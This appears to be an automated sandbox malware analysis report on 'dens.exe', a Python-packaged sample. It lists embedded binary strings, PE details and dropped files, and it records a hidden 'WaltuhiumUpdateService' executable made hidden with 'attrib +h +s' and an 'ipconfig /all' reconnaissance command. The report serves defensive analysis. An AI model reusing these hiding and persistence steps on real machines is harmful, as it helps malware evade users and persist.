            Source: Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\buffer\buffer.cBUF_MEM_growBUF_MEM_grow_cleancompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap` source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: dens.exe, 00000000.00000003.1665506325.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665022014.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: dens.exe, 00000000.00000003.1661110438.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: dens.exe, 00000000.00000003.1664590602.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665368820.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666519024.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: dens.exe, 00000000.00000003.1665157382.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1663980456.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664523044.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: dens.exe, 00000000.00000003.1664590602.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664725190.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
            Source: Binary string: k1k2k3X9_62_PENTANOMIALp.otherp.onBasisp.tpBasisp.ppBasismX9_62_CHARACTERISTIC_TWOp.primep.char_twofieldTypeX9_62_FIELDIDX9_62_CURVEfieldIDcurvebaseECPARAMETERSvalue.named_curvevalue.parametersvalue.implicitlyCAECPKPARAMETERSprivateKeyparameterspublicKeyEC_PRIVATEKEYec_asn1_group2fieldidcrypto\ec\ec_asn1.cec_asn1_group2curveEC_GROUP_get_ecparametersEC_GROUP_get_ecpkparametersEC_GROUP_new_from_ecparametersEC_GROUP_new_from_ecpkparametersi2d_ECPKParametersd2i_ECPrivateKeyi2d_ECPrivateKeyi2d_ECParametersd2i_ECParameterso2i_ECPublicKeyi2o_ECPublicKeycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Tue Sep 3 19:22:24 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665300726.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1663850239.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666268915.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666675608.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: dens.exe, 00000000.00000003.1663289848.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, _uuid.pyd.0.dr
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, _wmi.pyd.0.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664454967.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665435710.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665300726.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, _wmi.pyd.0.dr
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.pdb source: powershell.exe, 00000052.00000002.1892866312.00000217AE943000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666061436.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666519024.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666130356.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664659823.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666432610.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: dens.exe, 00000000.00000003.1661110438.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665708925.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665435710.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664385796.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666196697.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664318244.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665091592.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664047310.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.pdbhP" source: powershell.exe, 00000052.00000002.1892866312.00000217AE943000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664117143.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: dens.exe, 00000000.00000003.1665506325.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666268915.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665849743.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665708925.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1663915027.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664047310.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: dens.exe, 00000000.00000003.1662940240.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: cryptography_rust.pdb source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665849743.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666432610.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: dens.exe, 00000000.00000003.1661475799.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmp
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665234767.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: dens.exe, 00000000.00000003.1664185093.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: dens.exe, 00000000.00000003.1663915027.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665779625.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
            Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666196697.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664454967.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666130356.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666675608.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665639486.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665368820.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: dens.exe, 00000000.00000003.1664254134.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664523044.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664725190.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666353635.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: dens.exe, 00000000.00000003.1665157382.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057481054.000002D9AA8E0000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665779625.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
            Source: dens.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: dens.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: dens.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: dens.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: dens.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: VCRUNTIME140_1.dll.0.drStatic PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
            Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
            Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
            Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
            Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
            Source: python312.dll.0.drStatic PE information: section name: PyRuntim
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 82_2_00007FFD9A286329 push ecx; ret 82_2_00007FFD9A28632C

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\Desktop\dens.exeProcess created: "C:\Users\user\Desktop\dens.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\libcrypto-3.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_brotli.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\libffi-8.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\python312.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exeJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\yarl\_helpers_c.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_http_parser.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\sqlite3.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\ucrtbase.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\frozenlist\_frozenlist.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_websocket.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\libssl-3.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\yarl\_quoting_c.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_wmi.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_http_writer.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\multidict\_multidict.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_helpers.cp312-win_amd64.pydJump to dropped file
